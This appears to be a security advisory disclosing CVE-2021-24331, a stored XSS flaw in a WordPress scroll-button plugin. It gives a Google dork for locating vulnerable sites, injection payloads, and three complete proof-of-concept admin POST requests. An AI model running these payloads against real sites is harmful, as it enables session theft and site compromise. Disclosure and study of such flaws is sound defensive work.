/*!
- # VULNERABILITY: Smooth Scroll Page Up/Down Buttons WordPress Plugin <= 1.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/smooth-page-scroll-updown-buttons/
- # DATE: 2021-04-24
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Mark Senff [ http://www.senff.com ]
- # SOFTWARE VERSION: <= 1.3
- # SOFTWARE LINK: https://wordpress.org/plugins/smooth-page-scroll-updown-buttons/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24331
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the Smooth Scroll Page Up/Down Buttons plugin through v1.3 for WordPress.

[i] Vulnerable parameter(s): $page_scroll_buttons_options['psb_distance'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:222), $page_scroll_buttons_options['psb_buttonsize'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:229), $page_scroll_buttons_options['psb_speed'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:237).



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "

[$] " autofocus=autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13



### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13



### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze